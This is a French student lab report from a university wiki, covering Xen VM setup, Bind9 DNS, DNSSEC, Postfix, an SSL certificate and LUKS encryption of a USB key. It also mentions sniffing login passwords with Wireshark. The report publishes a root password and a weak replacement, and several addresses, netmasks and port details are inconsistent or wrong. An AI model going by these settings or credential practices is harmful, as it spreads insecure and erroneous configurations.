[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54016</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54016"/>
				<updated>2020-11-27T17:17:12Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Serveur SSH */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on ajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une passerelle doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interface avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comme ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
L'architecture du réseau est la suivante : &lt;br /&gt;
[[Fichier:Architecture2-MA2a5-2020_2021.JPG|1000px|thumb|left|Architecture du réseau]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le problème est que si on regarde le réseau n'est pas vraiment redondant : &lt;br /&gt;
&lt;br /&gt;
- Si on a une coupure de courant tout le réseau s'effondrent, dans l'idéale, il faudrait des onduleurs et un réseau électrique séparé pour la Baie1 et la Baie2/3&lt;br /&gt;
&lt;br /&gt;
- Le réseau ADSL n'est pas fonctionnelle donc si on perd le réseau Polytech on n'as plus accès aux machines.&lt;br /&gt;
&lt;br /&gt;
- Toutes les VM et les sites WEB sont sur la baie3 qui héberge le serveur de virtualisation Capbreton, si on perd la baie3 tout le système tombe.&lt;br /&gt;
&lt;br /&gt;
- Pour finir dans l'idéale les deux bais devrais être dans des bâtiments séparer en cas d'incendie, on risque de perdre les deux bais.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
Grace aux efforts de monsieur Xavier Redon pour permettre de joindre Capbreton a distance pendant le confinement avec la commande 'SSH'.&lt;br /&gt;
&lt;br /&gt;
On peux donc maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par Gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié notre DNS a une ip, il faut renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas Gandi ne pourras pas liée les DNS a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon notre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commencer, on crée un répertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les renommer pour plus de transparence.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a Gandi comme montrer ci-dessous en n'oubliant pas de sélectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le DNS et représente la chaine d'authentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une messagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérification de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenêtre de configuration s'ouvre. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la réception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les message reçu en tapant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on reçoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que Gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoin de pouvoir recevoir les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commande &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différant care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyé le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de Gandi on reçoit un code de confirmation ainsi qu'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers Gandi a téléchargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
